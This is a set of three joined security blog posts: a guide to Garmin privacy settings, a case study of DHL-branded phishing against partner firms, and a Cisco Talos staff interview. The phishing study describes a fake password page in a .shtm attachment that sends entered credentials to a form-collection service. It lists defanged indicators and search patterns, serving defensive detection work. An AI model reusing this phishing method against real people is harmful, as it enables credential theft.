In 2022, similar vulnerabilities were discovered in devices from Garmin, arguably one of the most popular manufacturers of sports smartwatches and fitness gadgets, although these issues were promptly patched.

In light of these kinds of threats, it’s natural to want to maximize your privacy by properly configuring the security settings in your sports apps. Today, we’ll break down how to protect your data within Garmin Connect and the Connect IQ Store — two online services in one of the most widely used sports gadget ecosystems.



The privacy settings are located in different sections of the menu depending on whether you’re using the mobile app or the web version.

How to find the privacy settings in Garmin Connect for iOS — the process is essentially the same in the Android version of the app

There, you can adjust the visibility of your profile, activities, and steps, and even decide who can see your badges. For the highest level of privacy, we recommend selecting Only me. This ensures that your personal information, workout stats, and other data are visible only to you.

Revealing your routes is one of the most significant privacy risks. This could allow malicious actors to track you in near real-time.

Analysis of publicly available geodata has repeatedly revealed leaks of highly confidential information — from the locations of secret U.S. military bases exposed by anonymized heatmaps of service members’ activity, to the routes of head-of-state motorcades, pieced together from their bodyguards’ smartwatch tracking data. All this data ended up publicly accessible, not because of a hack, but due to incorrect privacy settings within the app itself, which broadcasts all of the owner’s movements online by default.

These leaks clearly showed that data from wearable sensors can cause a lot of problems for their wearers. Even if you’re not guarding top government officials, training maps can reveal your home address, workplace, and other frequently visited locations.

Garmin’s tactical watch models include a Stealth mode feature, designed specifically for military personnel. In their line of work, a lack of privacy can be a matter of life and death. However, with Garmin Connect, you can set up your own privacy zones for almost every Garmin gadget.

Garmin’s Privacy Zones are quite similar to a feature Strava introduced back in 2013. They automatically hide the start and end points of your workouts if these fall within a designated area. And even if you share your workout with the whole world, it’ll be impossible to see your exact location — for example, your home.
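The idea behind a privacy zone can be sketched in a few lines of Python. Garmin has not published its algorithm, so this is an assumption-based illustration: it trims leading and trailing GPS points that fall within a given radius of the zone center (using the haversine distance), hiding where a workout starts and ends while leaving the rest of the route intact. `apply_privacy_zone` is a hypothetical helper.

```python
import math

EARTH_RADIUS_M = 6_371_000  # mean Earth radius in meters


def haversine_m(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two (lat, lon) points in meters."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = p2 - p1
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def apply_privacy_zone(track: list[tuple[float, float]],
                       center: tuple[float, float],
                       radius_m: float) -> list[tuple[float, float]]:
    """Drop leading and trailing points inside the zone; keep the middle of the route."""
    def inside(pt: tuple[float, float]) -> bool:
        return haversine_m(pt[0], pt[1], center[0], center[1]) <= radius_m

    start = 0
    while start < len(track) and inside(track[start]):
        start += 1
    end = len(track)
    while end > start and inside(track[end - 1]):
        end -= 1
    return track[start:end]
```

Note that a route passing through the zone mid-workout is kept in this sketch, since only the start and end points are hidden; a larger radius makes it harder to infer the exact location from where the visible track begins.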

Just a bit further up in that same section, it’s worth checking out other ways your movement data might be used: for instance, to create heatmaps based on user routes. You can opt out of sharing this kind of data. To understand what each function does and how to adjust it, simply tap Edit directly below it. A description will pop up, explaining what data is collected and how it’s used.



Changing your privacy settings won’t retroactively apply to activities you’ve already saved in Garmin Connect. Even if you crank up your privacy to the max right now, all your past recordings will still show up with the visibility settings they had when you first created them. So if you’ve been using Garmin for a while and you’re just now getting around to tweaking your privacy, you’ll want to update your previously saved activities as well.

You can only change the privacy settings for your previously saved activities in the web version of Garmin Connect.

You can remove specific saved activities so no one can see them.

If you need to wipe all your previously saved activities, and you have a lot of them, it might be easier to delete your old account and create a new one. However, keep in mind that deleting your account will result in the loss of all your workout data and health metrics.

Another potential source of personal data leaks comes from devices and services that have access to your Garmin Connect account. If you frequently switch out your sports gadgets, make sure you remove them from your account.

Next, check the list of third-party apps that have access to your account:

It’s not just incorrect privacy settings in Garmin Connect that can expose your data. Vulnerabilities in apps and watch faces available through the Connect IQ Store marketplace can also lead to data leaks. In 2022, security researcher Tao Sauvage found that the Connect IQ API developer platform contained 13 vulnerabilities. These could potentially be exploited to bypass permissions and compromise your watch.

Some of these vulnerabilities have been lurking in the Connect IQ API since its very first release back in 2015. Over a hundred models of Garmin devices were at risk, including fitness watches, outdoor navigators, and cycling computers. Fortunately, these vulnerabilities were patched in 2023, but if you haven’t updated your device since before then (or you purchased a used gadget), it’s crucial to update its firmware to the latest version.

Even though these specific vulnerabilities have been fixed, the Connect IQ Store remains a potential entry point for future threats. Because of this, we recommend the following:

In an era of increasing cyberthreats to IoT devices, properly configuring the privacy settings on your wearables is crucial. Your digital security doesn’t just depend on device vendors; it also relies on the steps you take to protect your personal data.

To manage privacy for popular apps and gadgets, be sure to use our free service, Privacy Checker. And to stay on top of the latest cyberthreats and respond quickly, subscribe to our Telegram channel. Finally, the specialized privacy protection modes in Kaspersky Premium ensure maximum security for your personal information and help prevent data theft across all your devices.


Kaspersky official blog – Read More

ANY.RUN’s services process data on current threats daily, including attacks affecting supply chains. In this case study, we analyze examples of DHL brand abuse. DHL is a leading global logistics operator, and attackers exploit its brand recognition to send phishing emails, potentially targeting its partners.

We will demonstrate how ANY.RUN’s solutions can be used to identify such threats, collect technical indicators, and enhance security. Here are the key findings.

A supply chain attack is a type of cyberattack where adversaries gain access to a target organization by compromising a less protected external participant in the interaction chain: a contractor, a supplier, a technology partner, or another link.



Data from Cyble shows steady growth in supply chain attacks. From October 2024 to May 2025, an average of more than 16 incidents per month was recorded, a 25% increase over the previous eight-month period. A sharp spike in activity was observed in April and May 2025. This trend indicates growing attacker interest in this attack model and its increasingly widespread use in real campaigns.

Real-world examples include the Scattered Spider group’s attack on the Australian airline Qantas. The attackers got in through a third-party contact center, which is typical of such attacks.

Suppose we are information security specialists at a company that collaborates with DHL and could be used by attackers as an intermediate link in the attack chain.

Our task is to promptly detect phishing emails disguised as official correspondence from DHL. Such messages may target company employees, contractors, or other DHL partners.



To identify such activity, we use ANY.RUN’s YARA Search — we’ll create a rule that allows us to find .eml files mentioning DHL in the From, To, and Subject headers. This will help collect indicators, identify malicious attachments, and assess potential risks to our infrastructure.

The search delivered over 110 files and associated analysis sessions (tasks) from the ANY.RUN’s Interactive Sandbox. This data allows us to:

Not all found objects contain malicious payloads, but many are interesting from an analytical perspective, as examples of malicious brand abuse.

To effectively detect and analyze DHL-themed phishing attempts within your infrastructure, consider the following practices:

Utilize a YARA rule to scan your email endpoints for any emails related to DHL. Here’s an example of a YARA rule you can use:

This rule helps identify emails that mention DHL in the subject line, sender, or recipient fields.
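For teams that prefer scripting to YARA, the same header check can be approximated in Python for triaging exported .eml files. This sketch uses the standard `email` package and a whole-word, case-insensitive match on “DHL” in the From, To and Subject headers; `mentions_dhl` is a hypothetical helper, and it will also flag legitimate DHL mail, which is the intended starting point for manual review.

```python
import re
from email import message_from_string, policy

DHL_WORD = re.compile(r"\bdhl\b", re.IGNORECASE)
HEADERS = ("From", "To", "Subject")


def mentions_dhl(raw_eml: str) -> bool:
    """Return True if the From, To or Subject header contains the word DHL."""
    msg = message_from_string(raw_eml, policy=policy.default)
    return any(DHL_WORD.search(str(msg.get(h, ""))) for h in HEADERS)
```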

ANY.RUN’s Interactive Sandbox allows you to safely open and interact with suspicious files and URLs.

You can safely open emails and click through any attachments or links within a controlled environment. This helps in understanding the full attack chain from the initial phishing email to the execution of any malicious payloads.

Leverage ANY.RUN’s Threat Intelligence Lookup to quickly verify whether an artifact (URLs, file hashes, or even command line activities) involved in an alert within your company is associated with a specific attack.

Enrich alerts by identifying related campaigns and understanding the broader context of the attacks. This helps you recognize common tactics, techniques, and procedures (TTPs) used by attackers and respond to potential threats faster and more accurately.



Let’s analyze one of the emails found by the YARA search in ANY.RUN’s Sandbox.



The email sender masquerades as DHL Express International. The “From” field displays the corresponding display name, but the actual sender address Haalasolamagic@cirrcor[.]com belongs to a third-party organization not affiliated with DHL.
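A mismatch between the display name and the sender address is easy to check automatically. The sketch below is a hypothetical helper, not part of ANY.RUN. It flags a From header whose display name mentions the brand while the address domain is not on an allowlist. The allowlist containing only `dhl.com` is an illustrative assumption; a real deployment would use the brand’s published sending domains. The example addresses are placeholders, not the one from this sample.

```python
from email.utils import parseaddr

# Illustrative assumption: domains accepted as legitimate senders for the brand.
BRAND_DOMAINS = {"dhl.com"}


def is_display_name_spoof(from_header: str, brand: str = "dhl") -> bool:
    """Flag a From header whose display name claims the brand
    while the actual address lies outside the brand's domains."""
    display_name, address = parseaddr(from_header)
    if brand.lower() not in display_name.lower():
        return False  # the display name does not claim to be the brand
    domain = address.rpartition("@")[2].lower()
    # Accept the exact domain or any of its subdomains (e.g. mail.dhl.com).
    legit = any(domain == d or domain.endswith("." + d) for d in BRAND_DOMAINS)
    return not legit
```

For example, `is_display_name_spoof('"DHL Express International" <sender@example.net>')` returns `True`. Display-name checks are cheap but coarse, because attackers can also register lookalike domains.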

The email is addressed to a recipient in the meralco[.]com[.]ph domain, which belongs to Meralco, the largest energy company in the Philippines. DHL facilities have previously been mentioned in Meralco’s planned power outage notifications, and in May 2025, Meralco’s subsidiary MSpectrum announced a joint project with DHL Supply Chain Philippines.

Based on this, we can assume that DHL and Meralco do cooperate, and that the attackers’ choice of recipient may not be coincidental.

The email looks like part of an attempted supply chain attack: it is addressed not to DHL but to an organization affiliated with it. Exploiting DHL’s corporate identity and business context may be part of a scenario in which attackers try to reach the main target through its partners or contractors, a typical technique in targeted campaigns.

IMPORTANT: Please report all instances of DHL impersonation to the company’s official Anti-Abuse Mailbox.

The email body uses DHL’s corporate identity and phrasing typical of business correspondence. The recipient is asked to open an attachment, a file named “Draft BL & Shipping Invoice.shtm,” allegedly containing a preliminary invoice and bill of lading for confirmation. The .shtm extension (a variant of .html) is likely used to disguise the file and bypass email filters.
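Attachments with unusual HTML extensions can be flagged before a user opens them. The minimal sketch below assumes the raw message is available as bytes. It walks the attachments with the standard library’s `EmailMessage.iter_attachments()` and returns those whose extension appears in a small list of HTML-like suffixes. The helper name and the extension list are illustrative assumptions, not taken from the source.

```python
from email import message_from_bytes
from email.message import EmailMessage
from email.policy import default
from pathlib import PurePath

# Assumed list of extensions a browser will typically render as HTML.
HTML_LIKE = {".htm", ".html", ".shtm", ".shtml", ".xhtml"}


def html_like_attachments(raw_eml: bytes) -> list[str]:
    """Return filenames of attachments whose extension is HTML-like."""
    msg = message_from_bytes(raw_eml, policy=default)
    hits = []
    # iter_attachments() only walks the top level of the MIME tree;
    # nested parts (e.g. forwarded messages) would need a recursive walk.
    for part in msg.iter_attachments():
        name = part.get_filename()
        if name and PurePath(name).suffix.lower() in HTML_LIKE:
            hits.append(name)
    return hits


if __name__ == "__main__":
    demo = EmailMessage()
    demo["From"] = "sender@example.net"
    demo["To"] = "recipient@example.org"
    demo["Subject"] = "Draft BL & Shipping Invoice"
    demo.set_content("Please confirm the attached draft.")
    demo.add_attachment(b"<html></html>", maintype="application",
                        subtype="octet-stream", filename="invoice.shtm")
    print(html_like_attachments(demo.as_bytes()))
```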



When the attached file is opened in a browser, it displays a DHL-styled web page with a password form. The user is asked to authenticate to view a supposedly encrypted document sent by DHL. This is typical of phishing pages that imitate official delivery services to harvest credentials.



The network activity generated while interacting with this form contains a request to submit-form[.]com.

This service collects data entered into HTML forms and can forward it directly to a specified email address.

If we try to analyze the network request sent when data is entered into the form, we only see a connection on port 443. The connection is encrypted, and its contents, including the entered password, cannot be viewed without MITM techniques.



To get more information, we rerun the analysis of this email in ANY.RUN’s Sandbox with the HTTPS-MITM-PROXY (MITM) feature enabled, which gives us access to the contents of the network traffic.

In the new analysis with MITM enabled, we open the attached .shtm file and enter a password in the form, for example “password999,” then click “View Document”.



Going to the HTTP Requests tab, we find a POST request sent to https://submit-form[.]com/7zFSu099A.

The request contents confirm the transfer of entered data: the request body contains form field values, including the entered password. This proves that the attacker uses the third-party service submit-form[.]com to collect authentication data entered by the victim on the phishing page.



Using ANY.RUN’s Threat Intelligence Lookup to check the submit-form[.]com domain and related campaigns, we find more than 200 public analyses featuring the domain. Most are marked as malicious: attackers actively use submit-form[.]com to capture data entered on phishing pages, including passwords and email addresses.

Now we can estimate the relevance and scale of such threats and decide whether to block or monitor this domain.
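Once the domain is on a watch list, proxy logs can be screened for form submissions to it. The sketch below assumes a hypothetical, simplified log format: dicts with `src`, `method`, and `url` keys. It flags POST requests to submit-form.com or its subdomains. This only works where the proxy decrypts TLS or otherwise records the method and URL. As the encrypted session above shows, without that you see only a connection to the host on port 443, and matching on the hostname alone is the fallback.

```python
from urllib.parse import urlsplit

# Watched form-collection hosts; submit-form.com comes from the analysis above.
WATCHED_HOSTS = {"submit-form.com"}


def suspicious_form_posts(records):
    """Yield (src, url) for POST requests to a watched host or its subdomains.

    `records` is assumed to be an iterable of dicts with 'src', 'method'
    and 'url' keys (a hypothetical simplified proxy-log format).
    """
    for rec in records:
        if rec.get("method", "").upper() != "POST":
            continue
        # urlsplit().hostname is already lowercased and strips any port.
        host = urlsplit(rec.get("url", "")).hostname or ""
        if any(host == h or host.endswith("." + h) for h in WATCHED_HOSTS):
            yield rec.get("src"), rec["url"]
```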



To find additional indicators of similar attacks, we analyzed the DHL-styled image used in the email above. Using this image, we can find other phishing campaigns that reuse the same file, expanding our set of indicators and our understanding of the scale of brand abuse.

We extract the image’s SHA256 hash from the static analysis and perform a search for the image through ANY.RUN’s TI Lookup.
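The same SHA-256 hash can be computed locally with nothing but the standard library. This sketch reads the file in chunks so large files do not need to fit in memory. The function name is illustrative.

```python
import hashlib


def sha256_of_file(path, chunk_size=65536):
    """Return the SHA-256 hex digest of the file at `path`, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        # iter() with a sentinel keeps calling fh.read() until it returns b"" (EOF).
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


if __name__ == "__main__":
    import sys

    for file_path in sys.argv[1:]:
        print(sha256_of_file(file_path), file_path)
```

The resulting hex digest is the value to use in a hash search.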

The search returns 5 analyses featuring identical images. They were used in campaigns targeting various addresses that may belong to potential contractors, clients, or company employees.

These analyses allow us to study additional social engineering techniques and various phishing strategies and to collect threat indicators: email subjects, sender IP addresses, malicious domains.



Next, we search for domains that imitate official DHL resources to see which phishing domains might be used to masquerade as partner organizations. This helps us understand:

A simple query in ANY.RUN’s TI Lookup allows us to find phishing domains imitating DHL, focusing on typical patterns used in the logistics industry, including campaigns masquerading as delivery notifications, documents, or cargo movements.

domainName:"-dhl." or domainName:"dhlshipment*" OR domainName:"dhldocument*"

The query results provide access to 39 public analyses containing the specified patterns. This data can be used to enrich IOC collection and improve phishing detection and filtering by security systems.
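The same patterns can be applied to domains from your own logs with a local approximation that uses shell-style wildcards from Python’s `fnmatch` module. This sketch assumes the dash in the first pattern is an ordinary hyphen. It treats every pattern as a case-insensitive substring match. TI Lookup’s own matching semantics may differ, so results will not line up one-to-one with the query.

```python
from fnmatch import fnmatchcase

# Local approximation of the TI Lookup query above: each pattern is wrapped
# so it matches anywhere in the (lowercased) domain name.
LOOKALIKE_PATTERNS = ("*-dhl.*", "*dhlshipment*", "*dhldocument*")


def lookalike_domains(domains):
    """Return the domains (original casing) that match any lookalike pattern."""
    return [
        d for d in domains
        if any(fnmatchcase(d.lower(), p) for p in LOOKALIKE_PATTERNS)
    ]
```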



Additionally, we can search for files uploaded to ANY.RUN whose names mention the partner company. This analysis helps to:

Here is a TI Lookup query exposing files imitating legitimate DHL attachments:

filePath:"dhlreceipt*" or filePath:"dhlshipment*" or filePath:"dhldelivery*"

We found over 300 analyses containing the requested patterns in file names. Not all of them are malicious, but a significant portion are worth analyzing to update filters and detection rules and to raise awareness of the DHL impersonation techniques used in recent attacks.

In this case study, we demonstrated how ANY.RUN’s Interactive Sandbox and Threat Intelligence Lookup can be used to identify threats related to potential supply chain attacks. Using DHL as an example, we analyzed activity targeting its partners and contractors — from phishing emails to impersonating domains.

Such activity may be part of the preparation for supply chain attacks. The methods presented here help identify such risks early and can be adapted to the specifics of a particular organization.

Over 500,000 cybersecurity professionals and 15,000+ companies in finance, manufacturing, healthcare, and other sectors rely on ANY.RUN. Our services streamline malware and phishing investigations for organizations worldwide.

Request a trial of ANY.RUN’s services to see how they can boost your SOC workflows.

The post Beating Supply Chain Attacks: DHL Impersonation Case Study appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Welcome to the first episode of Humans of Talos, a new video interview series that shines a spotlight on team members across Talos. Through their personal stories, career journeys and unique perspectives, you’ll get an inside look at what it’s like to work in our organization and meet the people who make the internet more secure for all.

Amy Ciminnisi: Hello and welcome to the first episode of Humans of Talos! I’m here with Hazel Burton, who should be a familiar face to most of you. I’m curious: What led you to your role at Talos? What made you want to join?

Hazel Burton: I’d always worked in small businesses before and always had a bit of an entrepreneurial mindset because of that. I just started doing things that I wasn’t supposed to be doing! I commandeered an office in one of the small businesses, turned it into a TV studio and started creating security content. That somehow led me on a path to joining Cisco.

I was doing a lot of storytelling and communications around some of the main challenges that people in this industry go through, but I was always finding excuses to work with Talos. I love the people at Talos, but I also love the ethos: doing the right thing, even if it makes no commercial sense whatsoever. So when I was asked to hop over the fence and work full-time at Talos leading content programs and data-driven stuff, it was an opportunity to help a really strong organization rooted in that ethos to do what they do best and make things easier for people in this industry. So it was a pretty easy decision to make to join Talos.

AC: Following on from that, what advice would you give to someone who wants to join Talos?

HB: Ask bold questions would be my first piece of advice. This is a very safe space to be able to do things like that. Ask, “Could this work? What if we tried this?” I promise you, you will be hired based on you asking those questions and you will be trusted to find the answers, even if the answer is, “Yeah, that didn’t work at all, did it? Oh, well.”

The other one — I don’t know if I can say this, you might want to bleep it out — but don’t be an arsehole. The people that we work with are as generous as they are amazingly smart and talented. So sharing their knowledge, helping each other out, not mocking someone for not knowing something, saying, “I don’t have any experience in this, can you help me?” That is what Talos is about. If you are only looking after number one, then probably don’t join Talos. But if you do want to be part of something where everyone has your back, then do.

The third thing that I think is really important for people to know, because they might have been burned by this before, is that we do actually have a leadership team who fights to give Talos people the air cover that they need when they need to go out and do things. So, it happens quite often where we’ll have to drop something and go to a rapid response effort — because, you know, the world — and we’re given the resources to be able to do that and the air cover. So if you don’t have that at the moment, trust me: When you find it, it’s the most amazing thing in the world because you know that you are going to have a clear runway. That is the nature of how the organization works.

AC: Yeah. It doesn’t just help the person grow their own skillset, and it doesn’t just help Talos; having that air cover helps everyone as a whole, the cybersecurity community and beyond.

HB: Also, bring your own nerdy self to work! Again, it’s a very safe place to do that.

For more, watch the full interview.

Cisco Talos Blog – Read More